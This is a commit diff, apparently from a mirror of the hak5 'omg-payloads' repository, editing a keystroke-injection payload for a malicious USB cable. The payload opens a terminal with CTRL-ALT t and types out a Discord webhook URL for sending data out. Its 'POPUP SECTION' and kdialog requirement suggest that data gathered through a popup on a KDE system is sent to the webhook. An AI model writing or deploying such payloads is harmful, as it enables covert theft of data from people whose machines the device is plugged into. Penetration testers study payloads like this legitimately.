mirror of https://github.com/hak5/omg-payloads.git
Update payload.txt
parent
af4a7b779d
commit
7d3e33237b
|
@ -13,20 +13,17 @@ REM - Internet Connection
|
||||||
REM - Discord webhook
|
REM - Discord webhook
|
||||||
REM - KDE/kdialog based
|
REM - KDE/kdialog based
|
||||||
|
|
||||||
|
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||||
|
DEFINE #WEBHOOK example.com
|
||||||
|
|
||||||
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### POPUP SECTION ####
|
REM #### POPUP SECTION ####
|
||||||
|
|
||||||
|
STRINGLN WEBHOOK_URL="#WEBHOOK"
|
||||||
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
|
||||||
DEFINE WEBHOOK example.com
|
|
||||||
STRING WEBHOOK_URL="
|
|
||||||
STRING WEBHOOK
|
|
||||||
STRING "
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
||||||
REM All-in-one is important
|
REM All-in-one is important
|
||||||
|
|
Loading…
Reference in New Issue